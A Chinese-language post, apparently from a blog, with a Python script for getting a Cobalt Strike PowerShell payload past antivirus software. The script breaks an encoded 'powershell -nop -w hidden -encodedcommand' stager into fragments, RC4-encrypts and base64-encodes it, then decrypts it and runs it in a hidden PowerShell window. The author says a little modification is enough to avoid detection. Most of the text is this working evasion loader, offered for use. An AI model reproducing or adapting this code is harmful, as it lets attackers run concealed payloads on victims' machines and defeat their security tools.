其实杀软还是很好骗的,我们要想象杀软是如何查杀病毒的。
杀软会读取运行的可执行文件的二进制编码,查找是否含有病毒payload的标记
然后运行的时候也会检查执行的代码是否安全(这里我还是比较难做到,只能做到上传不被杀,过检查),因为可执行文件执行了相关敏感操作杀软会快速识别你这命令的危险程度,这里要看自己构造的命令是否是正常的貌似安全的逻辑。
import base64
import os
import glob
import subprocess as sp
class PowerShell:
# from scapy
def init(self, coding, ):
cmd = [self._where(‘PowerShell.exe’),
“-NoLogo”, “-NonInteractive”, # Do not print headers
“-Command”, “-”] # Listen commands from stdin
startupinfo = sp.STARTUPINFO()
startupinfo.dwFlags |= sp.STARTF_USESHOWWINDOW
self.popen = sp.Popen(cmd, stdout=sp.PIPE, stdin=sp.PIPE, stderr=sp.STDOUT, startupinfo=startupinfo)
self.coding = coding
def __enter__(self):
return self
def __exit__(self, a, b, c):
self.popen.kill()
def run(self, cmd, timeout=15):
b_cmd = cmd.encode(encoding=self.coding)
try:
b_outs, errs = self.popen.communicate(b_cmd, timeout=timeout)
except sp.TimeoutExpired:
self.popen.kill()
b_outs, errs = self.popen.communicate()
outs = b_outs.decode(encoding=self.coding)
return outs, errs
@staticmethod
def _where(filename, dirs=None, env="PATH"):
"""Find file in current dir, in deep_lookup cache or in system path"""
if dirs is None:
dirs = []
if not isinstance(dirs, list):
dirs = [dirs]
if glob(filename):
return filename
paths = [os.curdir] + os.environ[env].split(os.path.pathsep) + dirs
try:
return next(os.path.normpath(match)
for path in paths
for match in glob(os.path.join(path, filename))
if match)
except (StopIteration, RuntimeError):
raise IOError("File not found: %s" % filename)
class fixcode:
def rc4_run(key=“init_key”, message=“init_message”):
print(“RC4加密主函数”)
s_box = fixcode.rc4_init_sbox(key)
crypt = str(fixcode.rc4_excrypt_run(message, s_box))
return crypt
def rc4_fix(key="init_key", message="init_message"):
# print("RC4解密主函数调用成功")
s_box = fixcode.rc4_init_sbox(key)
crypt = fixcode.rc4_excrypt_fix(message, s_box)
return crypt
def rc4_init_sbox(key):
s_box = list(range(256)) # 我这里没管秘钥小于256的情况,小于256不断重复填充即可
# print("原来的 s 盒:%s" % s_box)
j = 0
for i in range(256):
j = (j + s_box[i] + ord(key[i % len(key)])) % 256
s_box[i], s_box[j] = s_box[j], s_box[i]
# print("混乱后的 s 盒:%s"% s_box)
return s_box
def rc4_excrypt_run(plain, box):
print("调用加密程序成功。")
res = []
i = j = 0
for s in plain:
i = (i + 1) % 256
j = (j + box[i]) % 256
box[i], box[j] = box[j], box[i]
t = (box[i] + box[j]) % 256
k = box[t]
res.append(chr(ord(s) ^ k))
# print("res用于加密字符串,加密后是:%res" %res)
cipher = "".join(res)
# print("加密后的字符串是:%s" %cipher)
# print("加密后的输出(经过编码):")
# print(str(base64.b64encode(cipher.encode('utf-8')), 'utf-8'))
return (str(base64.b64encode(cipher.encode('utf-8')), 'utf-8'))
def rc4_excrypt_fix(plain, box):
print("调用解密程序成功。")
plain = base64.b64decode(plain.encode('utf-8'))
plain = bytes.decode(plain)
res = []
i = j = 0
for s in plain:
i = (i + 1) % 256
j = (j + box[i]) % 256
box[i], box[j] = box[j], box[i]
t = (box[i] + box[j]) % 256
k = box[t]
res.append(chr(ord(s) ^ k))
# print("res用于解密字符串,解密后是:%res" %res)
cipher = "".join(res)
# print("解密后的字符串是:%s" %cipher)
# print("解密后的输出(没经过任何编码):")
return cipher
#这里算是个思路,实际上这里都可以删除掉,只是说加密分块可以逃过一些病毒查杀
fuckyou = “cs的部分powershell==”
fuckme5 = “JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADo”
fuckme6 = “ARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBLADEAVwBhAFcALwBpAFMAaABiAD”
safe360 = fuckme6 + fuckme5 + fuckyou
fuckme = “powershell”
fuckme1 = " -n"
fuckme2 = “-w "
fuckme3 = “hid”
fuckme4 = " -encode”
loveme = fuckme + fuckme1+'op ’ + fuckme2 + fuckme3+ ‘den’+ fuckme4+‘dcommand’
safe361=loveme+safe360
powshellsrun = fixcode.rc4_run(“dalizi”, safe361)
print(“这是加密编码” + powshellsrun)
print(’>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>’)
reworks = fixcode.rc4_fix(“dalizi”,“这里加密过长,自己可测试”)
print(“revie,这是解密后的编码” + reworks)
with PowerShell(‘GBK’) as ps:
outs, errs = ps.run(reworks)
修改使用一下即可免于查杀(运行代码需要自己构造)